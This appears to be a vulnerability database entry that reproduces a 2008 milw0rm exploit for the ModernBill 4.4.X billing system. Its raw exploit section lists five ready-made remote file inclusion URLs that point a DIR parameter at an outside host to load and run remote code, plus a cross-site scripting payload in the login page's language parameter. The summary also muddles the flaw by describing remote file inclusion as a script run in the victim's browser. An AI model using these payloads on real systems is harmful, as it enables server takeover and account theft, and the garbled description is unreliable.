ModernBill .:. Client Billing System - User Login

vendor:

Client Billing System

by:

nigh7f411

8.8

CVSS

HIGH

Remote File Inclusion and Cross-Site Scripting

94, 79

CWE

Product Name: Client Billing System

Affected Version From: 4.4.X

Affected Version To: 4.4.X

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ModernBill .:. Client Billing System – User Login

ModernBill versions 4.4.X and below are vulnerable to Remote File Inclusion and Cross-Site Scripting. An attacker can exploit this vulnerability by sending a malicious URL to the target user. The malicious URL contains a script that is hosted on a remote server. When the target user clicks on the malicious URL, the script is executed in the context of the target user's browser. This can allow the attacker to gain access to the target user's account and perform malicious activities.

Mitigation:

Upgrade to the latest version of ModernBill and apply the latest security patches.

Source

Exploit-DB raw data:

**************************************************************************************
ModernBill .:. Client Billing System - User Login
ModernBill  <= v4.4.X Remote File Inclusion Vulnerability  and xss by nigh7f411
http://xc0r3.net/
plezz go to ttp://xc0r3.net/forums/
**************************************************************************************

rfi
http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?

xss
http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+

**************************************************************************************

# milw0rm.com [2008-10-31]